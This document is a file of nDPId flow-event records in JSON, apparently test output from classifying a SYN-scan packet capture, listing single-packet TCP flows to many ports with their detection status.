+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059408,"flow_last_seen":1278275059408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 